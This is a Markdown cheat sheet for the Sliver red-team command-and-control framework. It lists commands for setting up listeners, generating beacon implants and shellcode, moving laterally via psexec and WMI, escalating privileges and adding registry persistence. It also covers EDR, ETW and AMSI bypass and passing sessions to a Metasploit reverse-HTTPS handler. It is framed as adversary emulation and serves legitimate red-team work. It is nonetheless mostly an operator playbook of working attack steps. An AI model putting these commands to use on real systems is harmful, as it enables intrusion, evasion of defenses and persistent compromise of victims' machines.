235 lines
4.4 KiB
Markdown
235 lines
4.4 KiB
Markdown
|
# Sliver Cheat Sheet
|
||
|
Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. Sliver's implants support C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS. Implants are dynamically compiled with unique X.509 certificates signed by a per-instance certificate authority generated when you first run the binary. Sliver server and client support MacOS, Windows, and Linux. Implants are supported on MacOS, Windows, and Linux.
|
||
|
|
||
|
---
|
||
|
|
||
|
## Installation
|
||
|
```
|
||
|
curl https://sliver.sh/install|sudo bash
|
||
|
```
|
||
|
|
||
|
## Sliver Service
|
||
|
```
|
||
|
cat > /etc/systemd/system/sliver.service << EOL
|
||
|
[Unit]
|
||
|
Description=Sliver Server
|
||
|
After=syslog.target network.target
|
||
|
|
||
|
[Service]
|
||
|
Type=simple
|
||
|
Restart=always
|
||
|
RestartSec=120
|
||
|
LimitNOFILE=20000
|
||
|
Environment=LANG=en_US.UTF-8
|
||
|
ExecStart=/opt/sliver/sliver-server_linux daemon -l 0.0.0.0 -p <port>
|
||
|
|
||
|
[Install]
|
||
|
WantedBy=multi-user.target
|
||
|
EOL
|
||
|
```
|
||
|
|
||
|
### Restart Deamon & Start Sliver
|
||
|
```
|
||
|
systemctl daemon-reload
|
||
|
systemctl enable --now sliver
|
||
|
```
|
||
|
|
||
|
### Install Letsencrypt
|
||
|
```
|
||
|
apt install letsencrypt -y
|
||
|
```
|
||
|
|
||
|
### Setup Letsencrypt
|
||
|
```
|
||
|
apt install apache2 -y
|
||
|
certbot certonly --non-interactive --quiet --register-unsafely-without-email --agree-tos -a webroot --webroot-path=/var/www/html -d <domain>
|
||
|
```
|
||
|
### Create a New Website
|
||
|
|
||
|
Clone website with wget.
|
||
|
```
|
||
|
wget --mirror --convert-links --html-extension <target>
|
||
|
```
|
||
|
|
||
|
Add content to HTTP(S) C2 websites to make them look more legit.
|
||
|
```
|
||
|
websites add-content --website <name> --web-path <path> --content ./public --recursive
|
||
|
```
|
||
|
|
||
|
## Team Server
|
||
|
|
||
|
|
||
|
#### Create New Operator
|
||
|
```
|
||
|
./sliver-server_linux operator -l <teamserver_ip> -p <teamserver_port> -n <username> -s /tmp/<username>.cfg
|
||
|
```
|
||
|
---
|
||
|
### Connect to Team Server
|
||
|
```
|
||
|
sliver-client import /tmp/<username>.cfg
|
||
|
sliver-client
|
||
|
```
|
||
|
|
||
|
### Create New Listener
|
||
|
|
||
|
#### MTLS
|
||
|
```
|
||
|
mtls -l 443 -L 0.0.0.0 -p
|
||
|
```
|
||
|
|
||
|
#### HTTPS
|
||
|
```
|
||
|
https -l 443 -L 0.0.0.0 -p
|
||
|
```
|
||
|
|
||
|
### HTTPS Domain
|
||
|
```
|
||
|
https --domain <domain> --cert /path/cert.pem --key /path/privkey.pem --website <website_name> -p
|
||
|
```
|
||
|
|
||
|
#### HTTP
|
||
|
```
|
||
|
http -l 80 -L 0.0.0.0 -p
|
||
|
```
|
||
|
---
|
||
|
|
||
|
## Payload Creation
|
||
|
|
||
|
### Generate Shellcode
|
||
|
```
|
||
|
generate beacon --mtls <ip address>:<port> -f shellcode
|
||
|
```
|
||
|
|
||
|
### Generate Binary
|
||
|
```
|
||
|
generate beacon --http <ip address>:<port>
|
||
|
```
|
||
|
|
||
|
## Post Exploitation
|
||
|
|
||
|
### Beacon
|
||
|
```
|
||
|
use <beacon_id>
|
||
|
```
|
||
|
|
||
|
### Sessions
|
||
|
Switching from Beacon Mode to Session Mode
|
||
|
```
|
||
|
sessions
|
||
|
use <sessions_id>
|
||
|
interactive
|
||
|
```
|
||
|
|
||
|
### Kill All Session
|
||
|
```
|
||
|
sessions -F -K
|
||
|
```
|
||
|
---
|
||
|
|
||
|
### Lateral Movement
|
||
|
|
||
|
#### SMB Listener
|
||
|
```
|
||
|
pivots named-pipe --bind <named_pipe>
|
||
|
profiles new --format service --named-pipe <local_ip>/pipe/<named_pipe> svc-smb-beacon
|
||
|
```
|
||
|
|
||
|
#### PSEXEC Lateral Movement
|
||
|
```
|
||
|
psexec -d Description -s PAEXEC -p svc-smb-beacon <remote_computer>
|
||
|
```
|
||
|
|
||
|
#### WMI Lateral Movement
|
||
|
```
|
||
|
sharp-wmi 'action=exec computername=<remote_computer> command="C:\windows\temp\xxx.exe" result=true'
|
||
|
```
|
||
|
---
|
||
|
|
||
|
## Internal Reconnaissance
|
||
|
|
||
|
#### Situational Awareness - Local
|
||
|
```
|
||
|
seatbelt -p C:\\Windows\\System32\\werfault.exe -- "-group=user"
|
||
|
```
|
||
|
|
||
|
#### Situational Awareness - Domain
|
||
|
```
|
||
|
sharp-hound-3 -- -c all
|
||
|
```
|
||
|
---
|
||
|
|
||
|
## Privilege Escalation
|
||
|
```
|
||
|
sharpup -t 120 -p C:\\Windows\\System32\\werfault.exe audit
|
||
|
```
|
||
|
---
|
||
|
## Persistence
|
||
|
```
|
||
|
sharpersist -- '-t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add'
|
||
|
```
|
||
|
---
|
||
|
## Pivoting
|
||
|
|
||
|
### Socks Proxy
|
||
|
```
|
||
|
interactive
|
||
|
use <session>
|
||
|
socks5 start
|
||
|
```
|
||
|
---
|
||
|
## Defense Evasion
|
||
|
To run this command need to install extension windows-bypass
|
||
|
### EDR Bypass
|
||
|
```
|
||
|
unhook-boof
|
||
|
```
|
||
|
### ETW Bypass
|
||
|
```
|
||
|
inject-etw-bypass <pid>
|
||
|
```
|
||
|
|
||
|
### AMSI Bypass
|
||
|
```
|
||
|
inject-amsi-bypass <pid>
|
||
|
```
|
||
|
---
|
||
|
|
||
|
## Session Passing
|
||
|
Session passing is using one payload to spawn another payload.
|
||
|
### Install Metasploit
|
||
|
```
|
||
|
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
|
||
|
chmod 755 msfinstall && \
|
||
|
./msfinstall
|
||
|
```
|
||
|
### Setup Metasploit Handler
|
||
|
```
|
||
|
use exploit/multi/handler
|
||
|
set payload windows/x64/meterpreter_reverse_https
|
||
|
set lhost <msf_ip>
|
||
|
set lport <msf_port>
|
||
|
exploit -jz
|
||
|
```
|
||
|
|
||
|
### Inject Metasploit
|
||
|
```
|
||
|
msf --lhost <msf_ip> --lport <msf_port>
|
||
|
```
|
||
|
|
||
|
## Misc
|
||
|
|
||
|
### Install Extension From Local
|
||
|
```
|
||
|
extensions install /path/bof
|
||
|
```
|
||
|
|
||
|
### Install Extension Using Armory
|
||
|
```
|
||
|
armory install windows-bypass
|
||
|
armory install windows-pivot
|
||
|
armory install situational-awareness
|
||
|
armory install .net-execute
|
||
|
armory install .net-pivot
|
||
|
armory install .net-recon
|
||
|
```
|